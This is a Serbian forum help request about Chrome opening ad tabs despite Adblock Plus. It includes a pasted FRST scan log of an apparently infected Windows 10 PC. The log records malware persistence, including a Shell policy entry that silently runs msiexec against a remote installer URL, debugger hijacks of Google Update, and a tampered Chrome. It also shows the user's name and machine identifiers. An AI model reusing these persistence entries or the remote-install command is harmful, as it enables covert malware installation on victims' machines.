Chrome izbacuje reklame pored instaliranog ADBLOCK Plus-a

1

Chrome izbacuje reklame pored instaliranog ADBLOCK Plus-a

offline
  • u administraciji
  • Pridružio: 16 Okt 2010
  • Poruke: 3468
  • Gde živiš: KRAGUJEVAC

Koristim Chrome, i kada kliknem na neki sajt automatski mi otvara u drugom tabu drugi sajt ( reklame, sexy reklame- na sexy sajtove ne idem uopšte jer znam da ima raznih prljavština ) . Iritira me to otvaranje drugog taba-reklama , sam od sebe.


Koristim Windows 10 , internet ADSL- kablom povezan, brzina 10 MB/S, MTS.


Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 20-08-2017
Ran by dejan (administrator) on DEJAN-PC (21-08-2017 21:41:17)
Running from C:\Users\dejan\Desktop
Loaded Profiles: dejan (Available Profiles: dejan)
Platform: Microsoft Windows 10 Pro Version 1703 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser not detected!)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-t.....scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Systems, Incorporated) C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgwdsvcx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avgsvcx.exe
(Digital Wave Ltd.) C:\Program Files\Common Files\DVDVideoSoft\lib\app_updater.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(Popcorn Time) C:\Program Files\Popcorn Time\Updater.exe
(Copyright 2017.) C:\Program Files\Zemana AntiMalware\ZAM.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgcsrvx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avguix.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgui.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgcfgex.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [485280 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [15111680 2017-02-10] (Realtek Semiconductor)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [587288 2017-03-15] (Oracle Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM\...\Run: [AvgUi] => C:\Program Files\AVG\Framework\Common\avguirnx.exe [220944 2016-12-06] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\Framework\Common\avguirnx.exe [220944 2016-12-06] (AVG Technologies CZ, s.r.o.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Run: [Viber] => C:\Users\dejan\AppData\Local\Viber\Viber.exe [30676560 2017-05-06] (Viber Media S.à r.l.)
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [7658200 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Run: [IDMan] => C:\Program Files\Internet Download Manager\IDMan.exe [4005944 2017-02-14] (Tonec Inc.)
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj88OYU3RTwyRjE3OWUyMdYyFjY2NkE2NUZXRjq2NWH5Fq== /q <==== ATTENTION
HKLM\...\Providers\9xihyc2u: C:\Program Files\Steerwardpriboly Builder\local32spl.dll <==== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {D53A7C8A-0595-11E7-85F9-64006A5CFC35} - -> No File
Startup: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2017-08-14]
ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\dejan\AppData\Local\Facebook\Games\FacebookGameroom.exe (Facebook)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{938526f2-0a05-4077-a0e9-c9636044b755}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{938526f2-0a05-4077-a0e9-c9636044b755}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{df927024-ee76-41e9-bec0-c7ce2732a227}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{df927024-ee76-41e9-bec0-c7ce2732a227}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files\Internet Download Manager\IDMIECC.dll [2016-12-10] (Internet Download Manager, Tonec Inc.)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_131\bin\ssv.dll [2017-04-24] (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-04-24] (Oracle Corporation)

Edge:
======
Edge HomeButtonPage: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> about:start

FireFox:
========
FF ProfilePath: C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467 [2017-08-21]
FF Homepage: Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467 -> www.google.com
FF Extension: (Vlc context menu) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\vlcplaylist@helgatauscher.de.xpi [2017-05-28]
FF Extension: (VideoDownloadConverter) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\_4zMembers_@www.videodownloadconverter.com [2017-08-21]
FF Extension: (Video DownloadHelper) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-08-21]
FF Extension: (Adblock Plus) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-08-21]
FF HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files\Internet Download Manager\idmmzcc2.xpi [2017-01-26]
FF HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\dejan\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\dejan\AppData\Roaming\IDM\idmmzcc5 [2017-08-20] [not signed]
FF Plugin: @java.com/DTPlugin,version=11.131.2 -> C:\Program Files\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll [2017-04-24] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.131.2 -> C:\Program Files\Java\jre1.8.0_131\bin\plugin2\npjp2.dll [2017-04-24] (Oracle Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [No File]

Chrome:
=======
CHR res: Infected resources.pak (search_engine). Reinstall Chrome. <==== ATTENTION
CHR DefaultProfile: ChromeDefaultData
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-21] <==== ATTENTION
CHR Extension: (Google Translate) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-01-29]
CHR Extension: (Google Slides) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-01-28]
CHR Extension: (Focusing On Wildlife) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\agacdhlpeofcinfkjdpgmagndibbbidj [2017-07-08]
CHR Extension: (Nice Day (weather)) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\akmijnhpfgblhkbdlnbldpmjgaiognoo [2017-03-16]
CHR Extension: (Google Docs) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2017-01-28]
CHR Extension: (Google Drive) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-01-28]
CHR Extension: (YouTube) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-28]
CHR Extension: (Adblock Plus) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-07-14]
CHR Extension: (Notifier for Gmail™) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\dcjichoefijpinlfnjghokpkojhlhkgl [2017-04-14]
CHR Extension: (SBRO Safe Browsing) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\eglegmheckaainhhlaiogafaecfgfbga [2017-04-14]
CHR Extension: (Google Sheets) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-01-28]
CHR Extension: (Tampermonkey BETA) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\gcalenpjmijncebpfijmoaglllgpjagf [2017-08-07]
CHR Extension: (Google Docs Offline) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-01-28]
CHR Extension: (Messenger) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\hiflndhkocfnebikccoedenpdnfjifcn [2017-02-26]
CHR Extension: (Unseen) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\iicapmagmhahddefgokbabbgieiogjop [2017-03-19]
CHR Extension: (Serfs Emancipation Day) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\jjhpggngpgmfhjcmbipomdpmpfcmcpnp [2017-03-30]
CHR Extension: (Image Search Options) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\kljmejbpilkadikecejccebmccagifhl [2017-03-22]
CHR Extension: (IDM Integration Module) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2017-07-15]
CHR Extension: (Chrome Web Store Payments) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-11]
CHR Extension: (Chrome NPAPI Replacement) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\okoafaojkokbmieeefnflkiklhanpeoc [2017-07-26]
CHR Extension: (Isasus) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pefapomofmnppmpggkkblepbaclckfcb [2017-08-09]
CHR Extension: (Home in Open Listings) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pfebdofkcophcpfikbieldpnajnkonoo [2017-05-30]
CHR Extension: (Gmail) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-01-28]
CHR Extension: (Chrome Media Router) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-14]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files\Internet Download Manager\IDMGCExt.crx [2017-02-13]
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files\Applemy\Application\chrome.exe <==== ATTENTION

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AGSService; C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
S3 AvgAMPS; C:\Program Files\AVG\Av\avgamps.exe [1002544 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 avgfws; C:\Program Files\AVG\Av\avgfws.exe [1458352 2017-06-26] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\Av\avgidsagent.exe [4153400 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 avgsvc; C:\Program Files\AVG\Framework\Common\avgsvcx.exe [935184 2016-12-06] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\Av\avgwdsvcx.exe [606352 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 DigitalWave.Update.Service; C:\Program Files\Common Files\DVDVideoSoft\lib\app_updater.exe [392168 2016-08-31] (Digital Wave Ltd.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2545848 2017-03-18] (Microsoft Corporation)
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [10883824 2017-03-17] (TeamViewer GmbH)
R2 Update service; C:\Program Files\Popcorn Time\Updater.exe [339968 2016-08-26] (Popcorn Time) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [265352 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [82488 2017-06-20] (Microsoft Corporation)
R2 ZAMSvc; C:\Program Files\Zemana AntiMalware\ZAM.exe [14554768 2017-04-29] (Copyright 2017.)
S2 BIT; C:\ProgramData\BIT\BIT.dll [X] <==== ATTENTION

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AndnetBus; C:\WINDOWS\System32\drivers\lgandnetbus.sys [15744 2014-10-09] (LG Electronics Inc.)
S3 AndNetDiag; C:\WINDOWS\system32\DRIVERS\lgandnetdiag.sys [23680 2014-10-09] (LG Electronics Inc.)
S3 ANDNetModem; C:\WINDOWS\system32\DRIVERS\lgandnetmodem.sys [28416 2014-10-09] (LG Electronics Inc.)
S0 Avgbootx; C:\WINDOWS\System32\DRIVERS\avgbootx.sys [19584 2016-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgdiskx; C:\WINDOWS\System32\DRIVERS\avgdiskx.sys [134912 2016-05-13] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\WINDOWS\system32\DRIVERS\avgfwd6x.sys [67336 2016-10-23] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\WINDOWS\System32\DRIVERS\avgidsdriverx.sys [259328 2017-03-23] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\WINDOWS\System32\DRIVERS\avgidshx.sys [207616 2016-10-05] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\WINDOWS\system32\DRIVERS\avgidsshimw8x.sys [41216 2016-08-02] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\WINDOWS\System32\DRIVERS\avgldx86.sys [244992 2016-11-30] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\WINDOWS\System32\DRIVERS\avglogx.sys [287008 2016-02-16] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\WINDOWS\System32\DRIVERS\avgmfx86.sys [197376 2017-04-11] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\WINDOWS\System32\DRIVERS\avgrkx86.sys [47360 2016-06-01] (AVG Technologies CZ, s.r.o.)
R0 avgunivx; C:\WINDOWS\System32\DRIVERS\avgunivx.sys [65280 2016-06-20] (AVG Technologies CZ, s.r.o.)
R1 Avgwfpx; C:\WINDOWS\system32\DRIVERS\avgwfpx.sys [246536 2016-08-04] (AVG Technologies CZ, s.r.o.)
R1 cryptfd; C:\WINDOWS\System32\drivers\cryptfd.sys [176552 2017-03-03] ()
S3 dg_ksudbus; C:\WINDOWS\System32\drivers\ksudbus.sys [75776 2011-03-25] (Microsoft Corporation) [File not signed]
S3 HtcUsbMdmV32; C:\WINDOWS\system32\DRIVERS\HtcUsbMdmV32.sys [105984 2009-10-27] (QUALCOMM Incorporated)
R1 lnvguard; C:\WINDOWS\System32\DRIVERS\lnvguard.sys [83392 2016-12-01] (Huorong Borui (Beijing) Technology Co., Ltd.)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [170200 2017-08-08] (Malwarebytes)
S3 pneteth; C:\WINDOWS\System32\drivers\pneteth.sys [13440 2011-11-25] (June Fabrics Technology Inc.)
R0 pwdrvio; C:\WINDOWS\System32\pwdrvio.sys [17160 2015-03-05] ()
S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [13064 2016-11-24] ()
S3 qcfilter; C:\WINDOWS\System32\drivers\qcusbfilter.sys [39456 2015-09-25] (QUALCOMM Incorporated)
S3 qcusbser; C:\WINDOWS\system32\DRIVERS\qcusbser.sys [214560 2015-09-25] (QUALCOMM Incorporated)
R3 rt640x86; C:\WINDOWS\System32\drivers\rt640x86.sys [795648 2017-02-20] (Realtek )
S3 usbbus; C:\WINDOWS\System32\drivers\lgusbbus.sys [13056 2014-05-27] (LG Electronics Inc.)
S3 UsbDiag; C:\WINDOWS\system32\DRIVERS\lgusbdiag.sys [20864 2014-05-27] (LG Electronics Inc.)
S3 USBModem; C:\WINDOWS\system32\DRIVERS\lgusbmodem.sys [25216 2014-05-27] (LG Electronics Inc.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [37464 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [243104 2017-03-18] (Microsoft Corporation)
S3 wdf_usb; C:\WINDOWS\system32\drivers\usb2ser.sys [128704 2016-08-16] (MBB)
S3 wdm_usb; C:\WINDOWS\System32\drivers\usb2ser.sys [128704 2016-08-16] (MBB)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [96672 2017-03-18] (Microsoft Corporation)
S3 WUDFWpdMtp; C:\WINDOWS\System32\drivers\WUDFRd.sys [160256 2017-03-18] (Microsoft Corporation)
R1 ZAM; C:\WINDOWS\System32\drivers\zam32.sys [181496 2016-10-15] (Zemana Ltd.)
R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard32.sys [181496 2016-10-15] (Zemana Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-08-21 21:41 - 2017-08-21 21:42 - 000019136 _____ C:\Users\dejan\Desktop\FRST.txt
2017-08-21 21:40 - 2017-08-21 21:40 - 001792512 _____ (Farbar) C:\Users\dejan\Desktop\FRST.exe
2017-08-21 21:37 - 2017-08-21 21:41 - 000000000 ____D C:\FRST
2017-08-21 21:37 - 2017-08-21 21:37 - 000000000 ____D C:\Users\dejan\Desktop\FRST-OlderVersion
2017-08-19 19:24 - 2017-08-19 19:24 - 000000000 ____H C:\Users\dejan\Documents\Default.rdp
2017-08-14 23:44 - 2017-08-14 23:44 - 000001227 _____ C:\Users\dejan\Desktop\Facebook Gameroom.lnk
2017-08-14 23:43 - 2017-08-14 23:44 - 000000000 ____D C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Facebook
2017-08-13 22:40 - 2017-08-13 22:40 - 000260776 _____ (Facebook) C:\Users\dejan\Downloads\FacebookGameroom.exe
2017-08-09 22:03 - 2017-08-01 04:47 - 005862816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-08-09 22:03 - 2017-08-01 04:43 - 000273312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-08-09 22:03 - 2017-08-01 04:41 - 000095648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-08-09 22:03 - 2017-08-01 04:38 - 000406544 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-08-09 22:03 - 2017-08-01 04:37 - 002023832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-08-09 22:03 - 2017-08-01 04:37 - 000582560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-08-09 22:03 - 2017-08-01 04:36 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-08-09 22:03 - 2017-08-01 04:36 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-08-09 22:03 - 2017-08-01 04:36 - 000173984 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-08-09 22:03 - 2017-08-01 04:35 - 000280472 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe
2017-08-09 22:03 - 2017-08-01 04:35 - 000133904 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2017-08-09 22:03 - 2017-08-01 04:34 - 000610584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-08-09 22:03 - 2017-08-01 04:34 - 000359552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2017-08-09 22:03 - 2017-08-01 04:34 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-08-09 22:03 - 2017-08-01 04:34 - 000168864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2017-08-09 22:03 - 2017-08-01 04:31 - 000176024 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-08-09 22:03 - 2017-08-01 04:20 - 002956288 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-08-09 22:03 - 2017-08-01 04:18 - 013841408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-08-09 22:03 - 2017-08-01 04:18 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-08-09 22:03 - 2017-08-01 04:17 - 000034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\tokenbinding.dll
2017-08-09 22:03 - 2017-08-01 04:16 - 000080896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-08-09 22:03 - 2017-08-01 04:14 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscore.dll
2017-08-09 22:03 - 2017-08-01 04:13 - 020504064 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-08-09 22:03 - 2017-08-01 04:13 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-08-09 22:03 - 2017-08-01 04:13 - 000121344 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll
2017-08-09 22:03 - 2017-08-01 04:12 - 019336192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-08-09 22:03 - 2017-08-01 04:12 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-08-09 22:03 - 2017-08-01 04:11 - 000187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-08-09 22:03 - 2017-08-01 04:10 - 000905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-08-09 22:03 - 2017-08-01 04:10 - 000358400 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-08-09 22:03 - 2017-08-01 04:08 - 000267264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncryptprov.dll
2017-08-09 22:03 - 2017-08-01 04:08 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 011870208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 005961728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 003447296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-08-09 22:03 - 2017-08-01 04:06 - 001585152 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-08-09 22:03 - 2017-08-01 04:06 - 001087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-08-09 22:03 - 2017-08-01 04:06 - 000798208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-08-09 22:03 - 2017-08-01 04:06 - 000236032 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvsvc.dll
2017-08-09 22:03 - 2017-08-01 04:04 - 006269440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-08-09 22:03 - 2017-08-01 04:04 - 003656192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-08-09 22:03 - 2017-08-01 04:04 - 001831936 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-08-09 22:03 - 2017-08-01 04:03 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-08-09 22:03 - 2017-08-01 04:01 - 000547328 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-08-09 22:03 - 2017-08-01 04:01 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-08-09 22:03 - 2017-08-01 00:45 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjet40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mswdat10.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mswstr10.dll
